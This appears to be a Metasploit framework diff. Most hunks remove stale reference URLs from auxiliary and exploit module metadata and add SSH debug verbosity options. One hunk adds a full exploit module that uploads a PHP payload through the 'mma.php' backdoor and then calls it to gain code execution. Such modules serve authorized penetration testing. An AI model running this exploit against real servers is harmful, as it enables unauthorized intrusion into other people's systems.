[ 'OSVDB', '578' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 27 2001'))
|
||||
|
|
|
@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3305' ],
|
||||
[ 'OSVDB', '76080'],
|
||||
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ]
|
||||
[ 'OSVDB', '76080']
|
||||
],
|
||||
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
|
|
|
@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2861' ],
|
||||
[ 'BID', '42342' ],
|
||||
[ 'OSVDB', '67047' ],
|
||||
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
|
||||
[ 'URL', 'http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
|
||||
]
|
||||
|
|
|
@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['OSVDB', '70762'],
|
||||
['CVE', '2011-0049'],
|
||||
['CVE', '2011-0063'],
|
||||
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
|
||||
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
|
||||
['EDB', '16103']
|
||||
],
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80262'],
|
||||
[ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ]
|
||||
[ 'OSVDB', '80262']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '86881' ],
|
||||
[ 'BID', '57969' ],
|
||||
[ 'EDB', '24504' ],
|
||||
[ 'URL', 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ],
|
||||
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-011' ]
|
||||
],
|
||||
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
|
||||
|
|
|
@ -18,10 +18,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %q{
|
||||
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
|
||||
],
|
||||
'Author' => ['SeawolfRN'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
|
|
@ -23,10 +23,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
The protocol deisgn issue also allows attackers to reset passwords on the device.
|
||||
},
|
||||
'Author' => 'Ben Schmidt',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
|
|
@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2012-2215' ],
|
||||
[ 'OSVDB', '80230' ],
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ],
|
||||
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html' ]
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
|
|
@ -18,11 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
must match the rogue_send parameters used exactly.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
system is using as its default route.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
|
||||
]
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -37,7 +37,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'References' => [
|
||||
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ],
|
||||
[ 'URL', 'http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm'],
|
||||
[ 'URL', 'http://www.onapsis.com/research-free-solutions.php' ], # Bizsploit Opensource ERP Pentesting Framework
|
||||
[ 'URL', 'http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf' ]
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -121,6 +121,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
framework_module: self,
|
||||
)
|
||||
|
||||
scanner.verbosity = :debug if datastore['SSH_DEBUG']
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
|
|
|
@ -214,6 +214,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
framework_module: self,
|
||||
)
|
||||
|
||||
scanner.verbosity = :debug if datastore['SSH_DEBUG']
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
|
|
|
@ -22,10 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Simply address any of the TODOs.
|
||||
),
|
||||
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://example.com/~jcontributor']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 15 2014',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
|
|
@ -47,7 +47,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' => [
|
||||
['CVE', '2015-1793'],
|
||||
['CWE', '754'],
|
||||
['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
|
||||
['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 9 2015'
|
||||
|
|
|
@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3996' ],
|
||||
[ 'OSVDB', '49321'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'],
|
||||
[ 'OSVDB', '49321']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 22 2008'))
|
||||
|
||||
|
|
|
@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3995' ],
|
||||
[ 'OSVDB', '49320'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ],
|
||||
[ 'OSVDB', '49320']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 22 2008'))
|
||||
|
||||
|
|
|
@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2008-3982'],
|
||||
[ 'OSVDB', '49324'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 13 2008'))
|
||||
|
||||
|
|
|
@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2007-5511'],
|
||||
[ 'OSVDB', '40079'],
|
||||
[ 'BID', '26098' ],
|
||||
[ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 17 2007'))
|
||||
|
|
|
@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2008-3983'],
|
||||
[ 'OSVDB', '49325'],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
|
||||
|
||||
],
|
||||
|
|
|
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-3984' ],
|
||||
[ 'OSVDB', '49326'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
|
||||
|
||||
[ 'OSVDB', '49326']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 13 2008'))
|
||||
|
||||
|
|
|
@ -22,8 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
['OSVDB', '8573'],
|
||||
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
|
||||
['OSVDB', '8573']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w{ irix unix },
|
||||
|
|
|
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['EDB', '36577'],
|
||||
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
|
||||
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
|
||||
],
|
||||
'Targets' =>
|
||||
|
|
|
@ -24,9 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2006-1148'],
|
||||
['OSVDB', '23777'],
|
||||
['BID', '17040'],
|
||||
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
|
||||
|
||||
['BID', '17040']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4828'],
|
||||
['OSVDB', '77183'],
|
||||
['BID', '50706'],
|
||||
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
|
||||
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
|
||||
],
|
||||
'Payload' =>
|
||||
|
|
|
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['OSVDB', '85344'],
|
||||
['OSVDB', '85345'],
|
||||
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
|
||||
['OSVDB', '85345']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -25,8 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2005-3252'],
|
||||
['OSVDB', '20034'],
|
||||
['BID', '15131'],
|
||||
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
|
||||
['BID', '15131']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -50,8 +50,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[
|
||||
[ 'CVE', '2009-2692' ],
|
||||
[ 'OSVDB', '56992' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
|
||||
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ]
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2011-0923'],
|
||||
[ 'OSVDB', '72526'],
|
||||
[ 'ZDI', '11-055'],
|
||||
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
|
||||
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
|
||||
[ 'URL', 'https://community.rapid7.com/thread/2253' ]
|
||||
],
|
||||
|
|
|
@ -47,8 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'BID', '37943' ],
|
||||
[ 'BID', '37974' ],
|
||||
[ 'OSVDB', '61956' ],
|
||||
[ 'URL', 'http://secunia.com/advisories/38344/' ],
|
||||
[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]
|
||||
[ 'URL', 'http://secunia.com/advisories/38344/' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
|
|
|
@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2015-0936'],
|
||||
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
|
||||
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
|
||||
],
|
||||
'DisclosureDate' => "Apr 01 2015", # Not a joke
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||
|
|
|
@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2012-3579'],
|
||||
['OSVDB', '85028'],
|
||||
['BID', '55143'],
|
||||
['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
|
||||
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
|
|
@ -37,8 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '50500'],
|
||||
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
|
||||
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
|
||||
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
|
||||
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
|
||||
],
|
||||
'Platform' => %w{ linux osx solaris win },
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2009-3869' ],
|
||||
[ 'OSVDB', '59710' ],
|
||||
[ 'BID', '36881' ],
|
||||
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
|
||||
[ 'ZDI', '09-078' ],
|
||||
[ 'ZDI', '09-078' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -38,9 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' => [ 'natron' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
|
||||
# list of trusted Certificate Authorities by java version
|
||||
[ 'URL', 'http://www.spikezilla-software.com/blog/?p=21' ]
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
|
||||
],
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2006-3677'],
|
||||
['OSVDB', '27559'],
|
||||
['BID', '19192'],
|
||||
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
|
||||
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
|
||||
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2014-3996' ],
|
||||
[ 'OSVDB', '110198' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/55' ]
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
|
|
|
@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2014-5301'],
|
||||
['OSVDB', '116733'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
|
|
|
@ -0,0 +1,111 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'nokogiri'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
|
||||
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
|
||||
operating system version because of the php_uname() function.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jay Turla <@shipcod3>',
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 10000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['mma file uploader', {} ]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 2 2012',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
|
||||
],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
|
||||
end
|
||||
|
||||
def has_input_name?(nodes, name)
|
||||
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if res
|
||||
n = ::Nokogiri::HTML(res.body)
|
||||
form = n.at('form[@id="uploader"]')
|
||||
inputs = form.search('input')
|
||||
if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
payload_name = "#{rand_text_alpha(5)}.php"
|
||||
|
||||
print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
|
||||
data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
|
||||
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
|
||||
post_data = data.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
if res
|
||||
if res.body =~ /uplod d0n3 in SAME file/
|
||||
print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
|
||||
register_files_for_cleanup(payload_name)
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Connection Timed Out')
|
||||
end
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(payload_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
end
|
|
@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2012-0261'],
|
||||
['OSVDB', '78064'],
|
||||
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
|
||||
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
|
||||
['URL', 'http://secunia.com/advisories/47417/'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -24,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2012-0262'],
|
||||
['OSVDB', '78065'],
|
||||
['URL', 'http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf'],
|
||||
['URL', 'http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/'],
|
||||
['URL', 'http://secunia.com/advisories/47417/'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2014-6034' ],
|
||||
[ 'OSVDB', '112276' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ "CVE", "2012-3153" ],
|
||||
[ "OSVDB", "86395" ], # Matches CVE-2012-3152
|
||||
[ "OSVDB", "86394" ], # Matches CVE-2012-3153
|
||||
[ "EDB", "31253" ],
|
||||
[ 'URL', "http://netinfiltration.com" ]
|
||||
[ "EDB", "31253" ]
|
||||
],
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Platform' => ['win', 'linux'],
|
||||
|
|
|
@ -32,8 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4075'],
|
||||
['OSVDB', '76594'],
|
||||
['BID', '50331'],
|
||||
['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],
|
||||
['EDB', '18021'],
|
||||
['EDB', '18021']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here
|
||||
['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/']
|
||||
],
|
||||
'DisclosureDate' => 'Apr 11 2013',
|
||||
|
|
|
@ -35,9 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'BID', '51061' ],
|
||||
[ 'CVE', '2011-4642' ],
|
||||
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip' ]
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -36,8 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2012-0391'],
|
||||
[ 'OSVDB', '78277'],
|
||||
[ 'EDB', '18329'],
|
||||
[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
|
||||
[ 'EDB', '18329']
|
||||
],
|
||||
'Platform' => %w{ java linux win },
|
||||
'Privileged' => true,
|
||||
|
|
|
@ -35,8 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2012-0394'],
|
||||
[ 'OSVDB', '78276'],
|
||||
[ 'EDB', '18329'],
|
||||
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
|
||||
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
|
||||
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ]
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
|
|